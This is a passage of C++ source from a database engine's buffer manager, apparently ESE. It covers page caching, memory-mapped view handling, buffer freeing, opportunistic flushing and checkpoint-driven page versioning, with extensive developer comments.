Assert( FOSMemoryPageAllocated( (*ppbf)->pv, g_rgcbPageSize[(*ppbf)->icbBuffer] ) );
OSMemoryPageReset( (*ppbf)->pv, g_rgcbPageSize[(*ppbf)->icbBuffer] );
}
}
// force the buffer into our working set by touching its pages
        Assert( (*ppbf)->err != wrnBFPageFlushPending );  // should never be in this state, but check just in case ...
const size_t cbChunk = min( (size_t)g_rgcbPageSize[(*ppbf)->icbBuffer], OSMemoryPageCommitGranularity() );
for ( size_t ib = 0; ib < (size_t)g_rgcbPageSize[(*ppbf)->icbBuffer] && !BoolParam( JET_paramEnableViewCache ); ib += cbChunk )
{
if ( AtomicExchangeAdd( &((LONG*)((BYTE*)(*ppbf)->pv + ib))[0], 0 ) ||
AtomicExchangeAdd( &((LONG*)((BYTE*)(*ppbf)->pv + ib + cbChunk))[-1], 0 ) )
{
if ( bfrsOld == bfrsNotResident )
{
AtomicIncrement( (LONG*)&g_cpgReclaim );
}
}
}
}
Assert( (*ppbf)->icbBuffer != icbPageInvalid );
if ( (*ppbf)->fNewlyEvicted )
{
(*ppbf)->fNewlyEvicted = fFalse;
AtomicIncrement( (LONG*)&g_cbfNewlyEvictedUsed );
AtomicExchangeAdd( (LONG*)&g_cbNewlyEvictedUsed, g_rgcbPageSize[icbBufferEvicted] );
}
(*ppbf)->fAvailable = fFalse;
// validate things that must be true of freshly allocated buffers ...
BFIAssertNewlyAllocatedPage( *ppbf );
return JET_errSuccess;
}
BOOL FBFICacheViewCacheDerefIo( const BF * const pbf )
{
Assert( pbf->bfat != bfatNone );
// When JET_paramEnableViewCache is on, this allows ESE to allocate buffers in one of two
// ways:
// 1. The normal read path (bfatViewMapped)
// 2. And sometimes the past EOF / new page path (bfatPageAlloc)
    // This creates an ambiguity, in that we have two alloc modes that are part of
    // the "ViewCache IO" method ... so while bfatPageAlloc is actually more similar to the
    // classic-BF caching/commit model of bfatFracCommit, it is in many places treated as
    // ViewCache (at least for IO).
    // It also creates a somewhat confusing state, in that the alloc type is covering and
    // imputing the IO model, but mostly that is because how we get the pv (what bfat covers)
    // allocated / set is implicitly tied to the alloc type - so the two are kind of
    // tied together.
    // But the upshot is that for IO - bfatViewMapped and bfatPageAlloc are both considered
    // part of ViewCache ...
return ( pbf->bfat == bfatViewMapped || pbf->bfat == bfatPageAlloc );
}
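// Informal summary of how the allocation types map onto the two IO models, derived from the
// checks in this function and its callers:
//
//     bfatFracCommit -> classic buffer-manager IO against a fractionally committed heap buffer
//     bfatViewMapped -> ViewCache IO against a memory-mapped view of the database file
//     bfatPageAlloc  -> ViewCache-style IO against a privately allocated page (new / past-EOF pages)
//     bfatNone       -> no backing memory yet (asserted against on entry to this function)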
ERR ErrBFICacheIMapPage( BF * const pbf, const BOOL fNewPage )
{
ERR err = JET_errSuccess;
Assert( pbf );
Assert( pbf->ifmp != 0 );
Assert( pbf->ifmp != ifmpNil );
Assert( pbf->pgno != pgnoNull );
Assert( pbf->icbBuffer != icbPageInvalid && pbf->icbBuffer != icbPage0 );
Assert( pbf->sxwl.FOwnWriteLatch() );
Expected( BoolParam( JET_paramEnableViewCache ) );
const size_t cb = g_rgcbPageSize[pbf->icbBuffer];
if ( !fNewPage )
{
// if this is not a new page operation then map a view of the page
IFileAPI *const pfapi = g_rgfmp[pbf->ifmp].Pfapi();
const BOOL fCleanUpStateSaved = FOSSetCleanupState( fFalse );
err = pfapi->ErrMMCopy( OffsetOfPgno( pbf->pgno ), cb, &pbf->pv );
AssertTrack( err != JET_errFileIOBeyondEOF, "BFICacheMapPageEof" );
FOSSetCleanupState( fCleanUpStateSaved );
if ( err == JET_errFileIOBeyondEOF )
{
// I _think_ that we can auto-extend the file in this way during recovery. In this code
// path, we fall through and call PvOSMemoryPageAlloc() to allocate a new page.
err = JET_errSuccess;
}
else
{
Assert( err <= JET_errSuccess ); // Not sure what warnings would mean, and if it should be considered mapped?
Assert( pbf->bfat == bfatNone );
if ( err == JET_errSuccess )
{
            // ErrMMCopy() succeeded, update state ...
Assert( pbf->pv );
Assert( FOSMemoryFileMapped( pbf->pv, cb ) );
Assert( !FOSMemoryFileMappedCowed( pbf->pv, cb ) ); // at least initially it shouldn't have made a copy
Assert( !FOSMemoryPageAllocated( pbf->pv, cb ) );
pbf->bfat = bfatViewMapped;
}
}
if ( err )
{
AssertRTL( JET_errOutOfMemory == err ); // really an ExpectedRTL()
Assert( pbf->pv == NULL );
// Any error we must bail ...
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
}
    else    // fNewPage
{
pbf->pv = NULL;
}
// if we didn't map a view then alloc a page of memory
if ( pbf->pv == NULL )
{
Assert( pbf->bfat != bfatViewMapped ); // We'll leak a mapping
Assert( pbf->bfat == bfatNone ); // Or maybe leak fractional commit?
if ( !( pbf->pv = PvOSMemoryPageAlloc( cb, NULL ) ) )
{
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
Assert( FOSMemoryPageAllocated( pbf->pv, cb ) );
Assert( !FOSMemoryFileMapped( pbf->pv, cb ) );
pbf->bfat = bfatPageAlloc;
}
HandleError:
if ( err < JET_errSuccess )
{
Assert( pbf->bfat == bfatNone );
Assert( pbf->pv == NULL );
}
else
{
Assert( pbf->bfat != bfatNone );
Assert( pbf->pv != NULL );
}
return err;
}
void BFICacheIUnmapPage( BF * const pbf )
{
Assert( pbf );
if ( FBFICacheViewCacheDerefIo( pbf ) )
{
Assert( pbf->ifmp != 0 );
Assert( pbf->ifmp != ifmpNil );
Assert( pbf->pgno != pgnoNull );
Expected( BoolParam( JET_paramEnableViewCache ) );
Assert( pbf->bfat != bfatNone );
Assert( pbf->bfat != bfatFracCommit );
Assert( pbf->bfat == bfatViewMapped || pbf->bfat == bfatPageAlloc ); // just in case anyone changes the set of these...
Assert( pbf->icbPage == pbf->icbBuffer );
IFileAPI *const pfapi = g_rgfmp[pbf->ifmp].Pfapi();
if ( pbf->bfat == bfatViewMapped )
{
Assert( FOSMemoryFileMapped( pbf->pv, g_rgcbPageSize[pbf->icbBuffer] ) );
Assert( !FOSMemoryPageAllocated( pbf->pv, g_rgcbPageSize[pbf->icbBuffer] ) );
if ( pfapi->ErrMMFree( pbf->pv ) >= JET_errSuccess )
{
pbf->pv = NULL;
pbf->bfat = bfatNone;
}
else
{
// I suspect a lot will go wrong at this point ...
AssertSz( fFalse, "This shouldn't fail (anymore), as we know when to call OSMemoryPageFree() vs. unmap a view." );
}
}
else
{
Assert( pbf->bfat == bfatPageAlloc );
Assert( FOSMemoryPageAllocated( pbf->pv, g_rgcbPageSize[pbf->icbBuffer] ) );
Assert( !FOSMemoryFileMapped( pbf->pv, g_rgcbPageSize[pbf->icbBuffer] ) );
OSMemoryPageFree( pbf->pv );
pbf->pv = NULL;
pbf->bfat = bfatNone;
}
}
}
void BFIFreePage( PBF pbf, const BOOL fMRU, const BFFreePageFlags bffpfDangerousOptions )
{
Assert( pbf->sxwl.FOwnWriteLatch() );
// assert page has no lingering dirty-type state (would imply evicting something we shouldn't)
Assert( pbf->bfdf == bfdfClean );
Enforce( pbf->err != errBFIPageFaultPending );
Enforce( pbf->err != wrnBFPageFlushPending );
Enforce( pbf->pWriteSignalComplete == NULL );
Enforce( PvBFIAcquireIOContext( pbf ) == NULL );
AssertTrack( !pbf->bfbitfield.FRangeLocked(), "BFFreeRangeStillLocked" );
Enforce( pbf->pbfTimeDepChainNext == NULL );
Enforce( pbf->pbfTimeDepChainPrev == NULL );
Assert( !pbf->fOlderVersion );
// assert page in viewcache mode hasn't leaked anything
Assert( FBFIValidPvAllocType( pbf ) );
Assert( pbf->bfat == bfatFracCommit || ( UlParam( JET_paramEnableViewCache ) && pbf->bfat == bfatNone ) );
Assert( icbPageInvalid != pbf->icbBuffer );
// officially remove this IFMP / PGNO from this BF
if ( pbf->ifmp != ifmpNil && // BF is holding a valid database page
PinstFromIfmp( pbf->ifmp ) ) // BF is holding a database page for an active instance
// (not retaining a page for a non-attached database)
{
PERFOpt( cBFCache.Dec( PinstFromIfmp( pbf->ifmp ), pbf->tce, pbf->ifmp ) );
if ( pbf->err == errBFIPageNotVerified )
{
PERFOpt( cBFCacheUnused.Dec( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
Assert( icbPageInvalid != pbf->icbPage );
}
// we should only update the histogram if we are not freeing the page for the first time.
if ( icbPageInvalid != pbf->icbPage )
{
AtomicDecrement( &g_rgcbfCachePages[pbf->icbBuffer] );
Assert( g_rgcbfCachePages[pbf->icbBuffer] >= 0 );
}
pbf->ifmp = ifmpNil;
pbf->pgno = pgnoNull;
pbf->tce = tceNone;
pbf->fAbandoned = fFalse;
pbf->bfbitfield.SetFRangeLocked( fFalse );
pbf->fSyncRead = fFalse;
// reset the page / buffer size
pbf->icbPage = icbPageInvalid;
// we do not reset the buffer size yet, the next time the buffer is allocated it will be set
// to an appropriate size.
// quiesce the buffer if the caller told us to, instead of adding it to the avail pool.
if ( bffpfDangerousOptions & bffpfQuiesce )
{
BFIReleaseBuffer( pbf );
}
// we can free this BF
else
{
// about to put in avail pool
pbf->sxwl.ReleaseOwnership( bfltWrite );
BFIAssertNewlyAllocatedPage( pbf, fTrue );
#ifdef DEBUG
// the assertions below are only valid if we're not running in view-cache mode and we're not
// adding the buffer to the avail pool for the first time, right out of the initial cache
// allocation
if ( !UlParam( JET_paramEnableViewCache ) &&
!( ( pbf->icbBuffer == g_icbCacheMax ) && ( IbfBFICachePbf( pbf ) >= cbfCacheAddressable ) ) )
{
Assert( !pbf->fQuiesced || ( pbf->icbBuffer == icbPage0 ) ); // All quiesced buffers must be fully dehydrated.
Expected( ( pbf->icbBuffer != icbPage0 ) || pbf->fQuiesced ); // Fully dehydrated buffers are expected to be quiesced.
}
#endif // DEBUG
if ( pbf->fQuiesced )
{
Assert( g_critCacheSizeResize.FOwner() );
if ( IbfBFICachePbf( pbf ) < cbfCacheAddressable )
{
// we're unquiescing a previously allocated-then-quiesced buffer, instead
// of a buffer being added to the avail pool for the first time as part
// of cache growth
Assert( !pbf->fInOB0OL && pbf->ob0ic.FUninitialized() );
g_bfquiesced.Remove( pbf );
}
AtomicIncrement( (LONG*)&g_cbfCacheClean );
cbfCacheSize++; // atomic not required
Assert( cbfCacheSize > 0 );
}
// mark this BF as available
pbf->fQuiesced = fFalse;
pbf->fAvailable = fTrue;
// free the available BF
Assert( !pbf->fInOB0OL && pbf->ob0ic.FUninitialized() );
g_bfavail.Insert( pbf, fMRU );
}
}
ERR ErrBFICachePage( PBF* const ppbf,
const IFMP ifmp,
const PGNO pgno,
const BOOL fNewPage,
const BOOL fWait,
const BOOL fMRU,
const ULONG_PTR pctCachePriority,
const TraceContext& tc,
const BFLatchType bfltTraceOnly,
const BFLatchFlags bflfTraceOnly )
{
ERR err;
PGNOPBF pgnopbf;
BFHash::ERR errHash;
BFHash::CLock lock;
BFLRUK::ERR errLRUK;
const TCE tce = (TCE)tc.nParentObjectClass;
Assert( pgno >= 1 );
// use pre-allocated BF if provided (we own freeing it in case of error)
pgnopbf.pbf = *ppbf;
FMP* pfmp = &g_rgfmp[ ifmp ];
// reject caching pages beyond the physical size of the database
if ( !fNewPage )
{
PGNO pgnoLast = pgnoNull;
err = pfmp->ErrPgnoLastFileSystem( &pgnoLast );
// FMP::ErrPgnoLastFileSystem() returns JET_errDatabaseCorrupted if the database
// file is smaller than cpgDBReserved. Treat that as EOF as we are obviously
// trying to cache a non-header page.
if ( ( ( err >= JET_errSuccess ) && ( pgno > pgnoLast ) ) ||
( err == JET_errDatabaseCorrupted ) )
{
Error( ErrERRCheck( JET_errFileIOBeyondEOF ) );
}
Call( err );
}
// allocate our BF FMP context, if not allocated
if ( !pfmp->FBFContext() )
{
Call( ErrBFISetupBFFMPContext( ifmp ) );
}
    // calculate the needed buffer size
const INT icbPageSize = IcbBFIPageSize( pfmp->CbPage() );
Assert( icbPageSize == IcbBFIBufferSize( pfmp->CbPage() ) );
// allocate a new BF to contain this IFMP / PGNO, assuming the buffer size will need to
// be as large as the page size, and waiting forever if necessary and requested
if ( pgnopbf.pbf == NULL )
{
const ERR errBufferAlloc = ErrBFIAllocPage( &pgnopbf.pbf, IcbBFIBufferSize( pfmp->CbPage() ), fWait, fMRU );
if ( errBufferAlloc < JET_errSuccess )
{
Expected( ( errBufferAlloc == JET_errOutOfMemory ) || ( errBufferAlloc == JET_errOutOfBuffers ) );
// report a hard error if we are failing to allocate buffers
//
// NOTE: ideally, this call would be inside of scavenge pages or in
// ErrBFIAllocPage but those functions exist outside the scope of any
// instance. that makes it tricky to raise the error. we will thus
// trap it here where we can get most (but not all) of the victims
//
OSUHAEmitFailureTag( PinstFromIfmp( ifmp ), HaDbFailureTagHard, L"9ee69aa5-53f9-43e6-9b6c-b817db21b9c2" );
}
Call( errBufferAlloc );
}
Assert( pgnopbf.pbf->sxwl.FOwnWriteLatch() );
BFIAssertNewlyAllocatedPage( pgnopbf.pbf );
Assert( pgnopbf.pbf->icbBuffer == IcbBFIBufferSize( pfmp->CbPage() ));
// set this BF to contain this IFMP / PGNO
Assert( ifmpNil != ifmp );
pgnopbf.pbf->ifmp = ifmp;
pgnopbf.pbf->pgno = pgno;
pgnopbf.pbf->icbPage = icbPageSize;
pgnopbf.pbf->tce = tce;
AssertTrack( !pgnopbf.pbf->bfbitfield.FRangeLocked(), "BFCacheRangeAlreadyLocked" );
pgnopbf.pbf->bfbitfield.SetFRangeLocked( fFalse );
PERFOpt( cBFCache.Inc( PinstFromIfmp( ifmp ), tce, ifmp ) );
Assert( icbPageInvalid != pgnopbf.pbf->icbBuffer );
AtomicIncrement( &g_rgcbfCachePages[pgnopbf.pbf->icbBuffer] );
Assert( g_rgcbfCachePages[pgnopbf.pbf->icbBuffer] > 0 );
pgnopbf.pgno = pgno;
// if we are mapping views then create a view of this page
if ( BoolParam( JET_paramEnableViewCache ) )
{
Call( ErrBFICacheIMapPage( pgnopbf.pbf, fNewPage ) );
}
else
{
Assert( FOSMemoryPageAllocated( pgnopbf.pbf->pv, g_rgcbPageSize[pgnopbf.pbf->icbBuffer] ) );
Assert( !FOSMemoryFileMapped( pgnopbf.pbf->pv, g_rgcbPageSize[pgnopbf.pbf->icbBuffer] ) );
Assert( pgnopbf.pbf->bfat == bfatFracCommit );
pgnopbf.pbf->bfat = bfatFracCommit; // just in case, but remove this if it holds awhile ...
}
Assert( FBFIValidPvAllocType( pgnopbf.pbf ) );
Assert( pgnopbf.pbf->bfat != bfatNone );
// insert this IFMP / PGNO in the LRUK
BOOL fRepeatedlyRead = fFalse;
const TICK tickCache = TickOSTimeCurrent();
errLRUK = g_bflruk.ErrCacheResource( IFMPPGNO( ifmp, pgno ),
pgnopbf.pbf,
tickCache,
pctCachePriority,
!fNewPage, // fUseHistory
&fRepeatedlyRead );
// we failed to insert this IFMP / PGNO in the LRUK
if ( errLRUK != BFLRUK::ERR::errSuccess )
{
Assert( errLRUK == BFLRUK::ERR::errOutOfMemory );
// bail with out of memory
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
// insert this IFMP / PGNO in the hash table
g_bfhash.WriteLockKey( IFMPPGNO( ifmp, pgno ), &lock );
errHash = g_bfhash.ErrInsertEntry( &lock, pgnopbf );
g_bfhash.WriteUnlockKey( &lock );
// the insert failed
if ( errHash != BFHash::ERR::errSuccess )
{
// release our allocated BF
//
// HACK: if we can't evict the resource, wait until we can. no one
// else will be able to evict it because we have the write latch so we
// can't get stuck here forever. besides, this case is extremely rare
TICK cmsecTotal = 0;
while ( g_bflruk.ErrEvictResource( IFMPPGNO( pgnopbf.pbf->ifmp, pgnopbf.pbf->pgno ),
pgnopbf.pbf,
fFalse ) != BFLRUK::ERR::errSuccess )
{
UtilSleep( dtickFastRetry );
cmsecTotal += dtickFastRetry;
if ( cmsecTotal > (TICK)cmsecDeadlock )
{
AssertSz( fFalse, "BF LRU-K eviction appears to be hung." );
cmsecTotal = 0;
}
}
// the insert failed because the IFMP / PGNO is already cached
if ( errHash == BFHash::ERR::errKeyDuplicate )
{
// fail with page already cached
Error( ErrERRCheck( errBFPageCached ) );
}
// the insert failed because we are out of memory
else
{
Assert( errHash == BFHash::ERR::errOutOfMemory );
// fail with out of memory
Error( ErrERRCheck( JET_errOutOfMemory ) );
}
}
// mark this BF as the current version of this IFMP / PGNO
pgnopbf.pbf->fCurrentVersion = fTrue;
// return success
*ppbf = pgnopbf.pbf;
Enforce( FBFICurrentPage( *ppbf, ifmp, pgno ) );
Enforce( pgnopbf.pbf->pbfTimeDepChainNext == NULL );
Enforce( pgnopbf.pbf->pbfTimeDepChainPrev == NULL );
Enforce( wrnBFPageFlushPending != pgnopbf.pbf->err );
Enforce( JET_errSuccess == pgnopbf.pbf->err );
Enforce( NULL == pgnopbf.pbf->pWriteSignalComplete );
Enforce( NULL == PvBFIAcquireIOContext( pgnopbf.pbf ) );
Assert( FBFIValidPvAllocType( pgnopbf.pbf ) );
Assert( pgnopbf.pbf->bfat != bfatNone );
if ( fRepeatedlyRead )
{
PERFOpt( cBFPagesRepeatedlyRead.Inc( PinstFromIfmp( pgnopbf.pbf->ifmp ), pgnopbf.pbf->tce ) );
}
const BOOL fDBScan = ( bflfTraceOnly & bflfDBScan );
// caching a page is always considered unique because it starts a new lifetime for the page in the cache
// also, do not count a DBM fault as a request to avoid polluting the perf counter
if ( !fNewPage && !fDBScan )
{
PERFOpt( cBFCacheUniqueReq.Inc( PinstFromIfmp( pgnopbf.pbf->ifmp ), pgnopbf.pbf->tce, pgnopbf.pbf->ifmp ) );
Ptls()->threadstats.cPageUniqueCacheRequests++;
}
// trace that we changed the state of this page
const BFRequestTraceFlags bfrtfTraceOnly = BFRequestTraceFlags(
( fNewPage ? bfrtfNewPage : bfrtfUseHistory ) |
( BoolParam( JET_paramEnableFileCache ) ? bfrtfFileCacheEnabled : bfrtfNone ) |
( fDBScan ? bfrtfDBScan : bfrtfNone ) );
BFITraceCachePage( tickCache, pgnopbf.pbf, bfltTraceOnly, (ULONG)pctCachePriority, bflfTraceOnly, bfrtfTraceOnly, tc );
OSTraceFMP( pgnopbf.pbf->ifmp, JET_tracetagBufferManagerBufferCacheState,
OSFormat( "Cached page=[0x%x:0x%x], pbf=%p, pv=%p tce=%d",
(ULONG)pgnopbf.pbf->ifmp,
pgnopbf.pbf->pgno,
pgnopbf.pbf,
pgnopbf.pbf->pv,
pgnopbf.pbf->tce ) );
return JET_errSuccess;
HandleError:
AssertRTL( err > -65536 && err < 65536 );
Assert( err < JET_errSuccess );
if ( pgnopbf.pbf != NULL )
{
// release our mapped or allocated BF
BFICacheIUnmapPage( pgnopbf.pbf );
Assert( pgnopbf.pbf->bfat == bfatNone || !UlParam( JET_paramEnableViewCache ) );
// free our buffer
BFIFreePage( pgnopbf.pbf, fMRU );
}
*ppbf = pbfNil;
return err;
}
// Determine whether this page's mapped view is still fresh (i.e. does not need to be refreshed)
INLINE BOOL FBFICacheViewFresh( const PBF pbf )
{
Assert( pbf->bfat == bfatViewMapped );
return DtickDelta( pbf->tickViewLastRefreshed, TickOSTimeCurrent() ) < dtickMaintRefreshViewMappedThreshold;
}
// Refresh the page by guardedly reading every OS MM page in an exception handler (handled
// by ErrMMIORead()), and update the last refreshed time.
ERR ErrBFICacheViewFreshen( PBF pbf, const OSFILEQOS qosIoPriorities, const TraceContext& tcBase )
{
ERR err = JET_errSuccess;
Assert( pbf->sxwl.FOwner() );
Assert( pbf->bfat == bfatViewMapped );
Assert( pbf->bfls != bflsHashed ); // this means
Assert( g_rgcbPageSize[g_icbCacheMax] == CbBFIPageSize( pbf ) );
TraceContextScope tcReclaimFromOS;
tcReclaimFromOS->iorReason.AddFlag( iorfReclaimPageFromOS );
HRT hrtStart = HrtHRTCount();
Call( g_rgfmp[pbf->ifmp].Pfapi()->ErrMMIORead( OffsetOfPgno( pbf->pgno ),
(BYTE*)pbf->pv,
CbBFIPageSize( pbf ),
IFileAPI::FileMmIoReadFlag( IFileAPI::fmmiorfKeepCleanMapped | IFileAPI::fmmiorfPessimisticReRead ) ) );
// We don't know for sure if this was an IO or not, but we're going to assume if it was over 100 mics, that
// it was in fact an IO. < 100 mics, probably just in the OS FS cache / view mapped. Note it would take
    // an IO device capable of 10k IOPS to stop tracking this latency.
const QWORD usecs = ( 1000000 * ( HrtHRTCount() - hrtStart ) ) / HrtHRTFreq();
if ( usecs > 100 )
{
BFITrackCacheMissLatency( pbf, hrtStart, bftcmrReasonMapViewRefresh, qosIoPriorities, *tcReclaimFromOS, err );
}
// hmmm, should we update?
//Ptls()->threadstats.cPageRead++;
pbf->tickViewLastRefreshed = TickBFIHashedLatchTime( TickOSTimeCurrent() );
HandleError:
return err;
}
// We have decided the page is ripe for flushing for some reason, do so ...
//
void BFIOpportunisticallyFlushPage( PBF pbf, IOREASONPRIMARY iorp )
{
CBFIssueList bfil;
// Since this is an opportunistic attempt, and will not fail the main operation we do not need cleanup path checking here.
const BOOL fCleanUpStateSaved = FOSSetCleanupState( fFalse );
// We used to pass qosIODispatchUrgentBackground here because we wanted to give the largest
// chance that the IO request was accepted - not that we wanted to build an IO queue actually
// that deep to move along checkpoint (or filthy flush). In prod analysis on namprd10dg140 we
// found 2.4% of IOs were coming down with the "max qos" value - that matches qosIODispatchUrgentBackground
// & iorpBFCheckpointAdv & iorfForeground, and so this is the source of it. Now we have the
// Meted Q - where it will always be accepted, but not pushed out urgently ... this is a better
// option at this point.
// Shouldn't this call to ErrBFIFlushPage be passing in fOpportune = fTrue?
const ERR errT = ErrBFIFlushPage( pbf,
IOR( iorp, iorfForeground ),
qosIODispatchWriteMeted | qosIODispatchImmediate,
( iorp == iorpBFFilthyFlush ) ? bfdfFilthy : bfdfDirty );
// Restore cleanup checking
FOSSetCleanupState( fCleanUpStateSaved );
if ( errT == errDiskTilt )
{
// This will occur if you do 32768 concurrent IOs due to the rangelock meted section going
// into overflow ... but ESE should not have let that happen ever - with the exception of
// this fault injection we added to make sure this path works. But we generally do not want
// our meted IOs to be rejected.
#ifdef DEBUG
AssertSz( ChitsFaultInj( 39452 ) > 0, "DiskTiltOnMetedWriteIoReqWithoutFi" );
#else
AssertTrack( fFalse, "DiskTiltOnMetedWriteIoReq" );
#endif
// unfortunately due to the bf issue list getting updated before the IO is actually
// accepted by the IO manager, we can get into a situation where errDiskTilt will give
// us an entry, but we've nothing to do. Nullify / rollback this situation.
bfil.NullifyDiskTiltFake( pbf->ifmp );
Assert( bfil.FEmpty() );
}
if ( errT == errBFIPageFlushed )
{
// Issue the enqueued page I/O here.
CallS( bfil.ErrIssue() );
}
else if ( errT == errBFIRemainingDependencies )
{
// No enqueued/pending page to be flushed, just abandon the logOps.
bfil.AbandonLogOps();
}
}
// We attempt to opportunistically version this page if it is required
// to maintain the checkpoint in the presence of the waypoint.
//
// Preferred Checkpoint
// ChkPoint "Overscan" ToFlush
// ( ChkPoint | LogRec
// | - Waypoint ) Waypoint | unflushed log buffers
// | | | | |
// | | | | | future log writes ->
// -------------------------|-------------|---------------------|-------------|ooooo| - - - - - - - - - - - -
// | | |
// current current "next"
// lgposOldestBegin0 lgposModify lgposModify
//
// In such a scenario, if we never actually take another update on this BF, then the "next" lgposModify
// never happens and the checkpoint can still be defended correctly: as the log moves on and the
// current lgposOldestBegin0 finally reaches the Preferred ChkPoint, the current lgposModify will no
// longer be within the waypoint.
//
// However, as we take the write latch (and we assume the lgposModify will be set to lgposLogRec
// or thereabouts), we already know that if we let this next lgposModify through, we will have
// allowed the Preferred ChkPoint to be offended by a considerable margin.
//
// So we version the page before the end of write latching (whether the latch was acquired via
// direct latch or an Read/RDW upgrade path) a page, then the current lgposOldestBegin0 and
// lgposModify, live their life normally on the v1 of the page, get flushed appropriately,
// meanwhile the v2 of the page is free to be hammered upon.
//
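// To make the effective-checkpoint-depth arithmetic in the function below concrete
// (illustrative numbers; this assumes JET_paramLogFileSize is expressed in KB, as the
// "* 1024" conversion suggests): with a desired checkpoint depth of 100 MB and a waypoint
// latency of 2 log files of 1024 KB each, the effective depth is 100 MB - 2 MB = 98 MB.
// The effective depth is also floored at 20% of the desired depth (20 MB here), so a very
// large waypoint cannot force a page to be versioned on every update.
//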
BOOL FBFIMaintIsImpedingCheckpointMaintenance( __in const PBF pbf, __out BOOL * const pfUrgentMaintReq )
{
const IFMP ifmp = pbf->ifmp;
INST * pinst = PinstFromIfmp( ifmp );
LOG * plog = pinst->m_plog;
Assert( pbf );
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
// Unused yet, but we'll need this someday I expect.
Assert( pfUrgentMaintReq );
*pfUrgentMaintReq = fFalse;
*pfUrgentMaintReq = FBFIChance( 40 );
// get the waypoint.
LGPOS lgposWaypoint = g_rgfmp[ ifmp ].LgposWaypoint();
// get the log tip; this is not thread safe, but it is for opportunistic purposes only -
// if something did go wacky, it would be a VERY rare case and only result in an
// extra version and writing of a page ...
LGPOS lgposLogTip = plog->LgposLGLogTipNoLock();
// if not during recovery and the log tip is beyond the waypoint (i.e. we
// have some LLR depth set) and this is a dirty page
if ( // with or without concurrency simulation
( FBFIChance( 20 ) || ( CmpLgpos( lgposLogTip, lgposWaypoint ) > 0 ) ) &&
//CmpLgpos( lgposLogTip, lgposWaypoint ) > 0 &&
pbf->bfdf > bfdfClean && // OB0 isn't enough by itself, see BFDirty() OB0 reset logic.
CmpLgpos( &pbf->lgposOldestBegin0, &lgposMax ) )
{
__int64 cbEffCheckpointDepth = 0;
// we're a logged page and dirty page ... see if any of the reasons we version are true
//
// Is the page going to impede the checkpoint within a waypoint, and touched
// within the waypoint.
//
ULONG_PTR cbCheckpointDepth = pinst->m_plog->CbLGDesiredCheckpointDepth();
cbEffCheckpointDepth = (__int64) cbCheckpointDepth;
// Now reduce the checkpoint by the waypoint to obtain the effective checkpoint ...
cbEffCheckpointDepth -= (__int64) UlParam( pinst, JET_paramWaypointLatency ) * 1024 * (__int64) UlParam( pinst, JET_paramLogFileSize );
// we can't really let this drop to zero, or we'd version a page on every repeated
// update. Using 20%, which was carefully selected after months of careful testing
// and study by an 8-person perf team. (no, not really)
if ( cbEffCheckpointDepth < (__int64) ( cbCheckpointDepth / 5 ) )
{
cbEffCheckpointDepth = cbCheckpointDepth / 5;
}
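// To illustrate the arithmetic above with assumed example values (not tuning guidance):
// a 100 MB desired checkpoint depth, JET_paramWaypointLatency = 2 and 1 MB log files
// (JET_paramLogFileSize = 1024) gives 100 MB - ( 2 * 1024 * 1024 ) = ~98 MB of effective
// depth; only if the waypoint pushed it below 20 MB (20% of 100 MB) would we clamp it
// back up to that floor.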
// This also effectively acts as foreground checkpoint maint, even though its primary
// purpose is to ensure the waypoint is protected.
const BOOL fWaypoint = g_fBFEnableForegroundCheckpointMaint &&
(LONGLONG) plog->CbLGOffsetLgposForOB0( lgposLogTip, pbf->lgposOldestBegin0 ) > cbEffCheckpointDepth;
//
// Is page marked during checkpoint advancement dependency walking that this page
// is impeding the checkpoint.
//
const BOOL fDependedPage = pbf->bfbitfield.FImpedingCheckpoint();
// concurrency simulation
const BOOL fRandomChance = FBFIChance( 20 );
//
// if this IFMP / PGNO is likely to impede the checkpoint for any of a few ways.
//
if ( fWaypoint || fDependedPage || fRandomChance )
{
// do not version the page if the most recent (but not current) version
// of the page has the same lgposModify as the current version of
// the page. there is simply no point in versioning pages more often
// than once per log file if we are trying to advance the checkpoint
const PBF pbfOlder = pbf->pbfTimeDepChainNext;
if ( NULL == pbfOlder ||
pbf->lgposModify.lGeneration != pbfOlder->lgposModify.lGeneration )
{
return fTrue;
}
}
}
// If we passed all those checks, no foreground maintenance is required.
return fFalse;
}
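// A minimal sketch of the intended caller pattern (BFIMaintImpedingPage below is the real
// consumer): while holding the x/w latch, ask FBFIMaintIsImpedingCheckpointMaintenance(),
// and if it answers fTrue, version the page and opportunistically flush the older image so
// the checkpoint can advance.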
void BFIMaintImpedingPage( PBF pbf )
{
PBF pbfVer = NULL;
BOOL fUrgentMaintReq = fFalse;
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
if ( FBFIMaintIsImpedingCheckpointMaintenance( pbf, &fUrgentMaintReq ) )
{
// Disable cleanup checking
// Opportunistic operation. Doesn't affect main operation.
const BOOL fCleanUpStateSaved = FOSSetCleanupState( fFalse );
if ( ErrBFIVersionPage( pbf, &pbfVer, fUrgentMaintReq ) >= JET_errSuccess )
{
Assert( pbf->pbfTimeDepChainNext != pbfNil );
pbfVer->sxwl.ReleaseWriteLatch();
if ( g_fBFEnableForegroundCheckpointMaint )
{
BFIOpportunisticallyFlushPage( pbfVer, iorpBFCheckpointAdv );
}
}
// Restore cleanup checking
FOSSetCleanupState( fCleanUpStateSaved );
}
}
// This is being used to maintain a page that is impeding progress in some way ...
// 1. it is used to unload a page when hot-page or checkpoint maintenance requires it
// 2. it is also used to unburden an immutable buffer, i.e. one currently under write IO.
//
// The function fails only if maintenance would violate a constraint of the
// engine ... i.e. the latter / second case where we could not unburden a
// write IO buffer, and so it is not OK to give out a write-latch to this
// page!
// The first case (for hot/checkpoint) is only opportunistic, and a failure to
// version pages there will not fail this API.
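// Illustrative (hypothetical) caller sketch - the variable names are assumptions for
// illustration, not an actual latch code path:
//
//   BFLatch bfl = { pbf->pv, (DWORD_PTR)pbf };
//   const ERR errMaint = ErrBFIMaintImpedingPageLatch( pbf, fTrue /* fOwnsWrite */, &bfl );
//   if ( errMaint == wrnBFLatchMaintConflict )
//   {
//       // bfl now references the new current-version BF (write latched); the original
//       // pbf has been unlatched and left behind to be flushed / evicted.
//       pbf = PBF( bfl.dwContext );
//   }
//   else
//   {
//       // on JET_errSuccess or a real error the caller still owns its original latch
//       // on the unchanged pbf (see the asserts at the end of the function).
//   }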
